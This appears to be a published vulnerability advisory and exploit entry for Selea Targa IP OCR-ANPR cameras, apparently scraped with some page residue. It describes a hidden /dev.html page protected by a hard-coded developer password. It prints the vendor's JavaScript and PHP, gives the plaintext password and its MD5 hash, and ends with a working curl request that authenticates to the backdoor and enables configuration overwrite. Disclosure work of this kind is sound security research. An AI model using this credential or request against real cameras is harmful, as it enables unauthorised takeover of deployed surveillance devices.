122 lines
No EOL
4.2 KiB
Text
122 lines
No EOL
4.2 KiB
Text
# Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite
|
|
# Date: 07.11.2020
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.selea.com
|
|
|
|
Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite
|
|
|
|
|
|
Vendor: Selea s.r.l.
|
|
Product web page: https://www.selea.com
|
|
Affected version: Model: iZero
|
|
Targa 512
|
|
Targa 504
|
|
Targa Semplice
|
|
Targa 704 TKM
|
|
Targa 805
|
|
Targa 710 INOX
|
|
Targa 750
|
|
Targa 704 ILB
|
|
Firmware: BLD201113005214
|
|
BLD201106163745
|
|
BLD200304170901
|
|
BLD200304170514
|
|
BLD200303143345
|
|
BLD191118145435
|
|
BLD191021180140
|
|
BLD191021180140
|
|
CPS: 4.013(201105)
|
|
3.100(200225)
|
|
3.005(191206)
|
|
3.005(191112)
|
|
|
|
Summary: IP camera with optical character recognition (OCR) software for automatic
|
|
number plate recognition (ANPR) also equipped with ADR system that enables it to read
|
|
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
|
|
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
|
|
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
|
|
this camera suitable for all installation conditions. Its built-in OCR software works
|
|
as an automatic and independent system without the need of a computer, thus giving
|
|
autonomy to the device even in the event of an interruption in the connection between
|
|
the camera and the operations centre.
|
|
|
|
Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that
|
|
enables the vendor to enable configuration upload / overwrite to the affected device
|
|
using the checkManufacturer() function through an AJAX method.
|
|
|
|
======================================================================================
|
|
/dev.html:
|
|
----------
|
|
...
|
|
...
|
|
function checkManufacturer(){
|
|
var manufacturer=$.cookie('manufacturer');
|
|
if (manufacturer){ $('#set_manufacturer').val('Disable manufacturer'); $('#dev_page').show(); $('#config_restore').show(); }
|
|
else{ $('#set_manufacturer').val('Enable manufacturer'); $('#dev_page').hide(); $('#config_restore').hide();}
|
|
}
|
|
checkManufacturer();
|
|
function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)};
|
|
$('#set_manufacturer').click(function(){
|
|
var manufacturer=$.cookie('manufacturer');
|
|
if (manufacturer){ $.cookie('manufacturer',null); location.reload(); }
|
|
else{
|
|
$.ajax({
|
|
url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()),
|
|
timeout: 2000,
|
|
cache:false,
|
|
mimeType: 'text/plain'
|
|
}).done(function(result){
|
|
try{
|
|
var info=$.parseJSON(result);
|
|
if (info.auth=="OK"){
|
|
setManufacturerTimeout();
|
|
location.reload();
|
|
...
|
|
...
|
|
|
|
/cgi-bin/utils.php:
|
|
-------------------
|
|
...
|
|
...
|
|
$cmd=$_GET["cmd"];
|
|
|
|
if ($cmd=="DEVPASS"){
|
|
$pwd=$_GET["pwd"];
|
|
|
|
$info=new StdClass();
|
|
$info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR";
|
|
|
|
print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT));
|
|
exit();
|
|
}
|
|
...
|
|
...
|
|
|
|
======================================================================================
|
|
|
|
Tested on: GNU/Linux 3.10.53 (armv7l)
|
|
PHP/5.6.22
|
|
selea_httpd
|
|
HttpServer/0.1
|
|
SeleaCPSHttpServer/1.1
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5615
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php
|
|
|
|
|
|
07.11.2020
|
|
|
|
--
|
|
|
|
|
|
$ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b
|
|
{ "auth": "OK" }
|
|
|
|
OR
|
|
|
|
Navigate to /dev.html and enter password: Selea781830, enable config upload. |